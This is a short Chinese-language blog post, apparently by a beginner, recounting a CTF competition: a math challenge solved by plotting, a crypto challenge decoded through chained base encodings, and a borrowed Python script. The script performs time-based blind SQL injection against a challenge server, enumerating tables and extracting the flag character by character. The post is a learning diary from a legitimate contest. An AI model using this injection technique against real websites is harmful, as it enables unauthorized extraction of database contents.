菜鸡打ctf,做了一天牢,算上签到题一共做上两道
签到
数学但高中
给出了一大串,一开始没看懂,学姐提醒才知道要画图
python太菜,只好手动一个一个粘
公式画图网址:https://www.desmos.com/calculator?lang=zh-CN
最后生成的图片:
然后试了半天sql没注进去,大佬的代码也没看懂
1 import requests
2
3 # sql = "select group_concat(table_name) from information_schema.tables where table_schema=database()" #Flllag
4 # sql = "select group_concat(column_name) from information_schema.columns where table_name='Flllag' and table_schema=database()" #Flagg
5 sql = "select group_concat(Flagg) from Flllag"
6 j = 36
7 flag = "flag{h3Ltx545LiDwpjQ8Ij1x241wIxS4fa"
8
9
10 while True:
11 for i in range(32, 128):
12 burp0_url = "http://web-bd1bbd084b.challenge.xctf.org.cn/index.php?id=1'||case+when(ascii(substr(({}),{},1))={})then(select sum('1')from information_schema.tables A,information_schema.columns B,information_schema.columns C)end-- ".format(sql, j, i)
13 print burp0_url
14 try:
15 requests.get(burp0_url, timeout=3)
16 if i == 127:
17 j = -1
18 except:
19 flag += chr(i)
20 print flag
21 j += 1
22 break
23
24 if j == -1:
25 print flag
26 exit(0)
还有个song,学姐拿到了个flag.txt,但是要密码
打开是这样的:
整了半天没搞明白是什么东西,搜了半天感觉跟pdf的图片扫出来的文字很像
结果最后看大佬wp发现是base85+64+62+58+32
这个32不太好使,换一个
剩下的看不懂,等会接着坐牢去了
大佬wp:https://mp.weixin.qq.com/s/DvRYMkFSr9SFqt_M0f8umg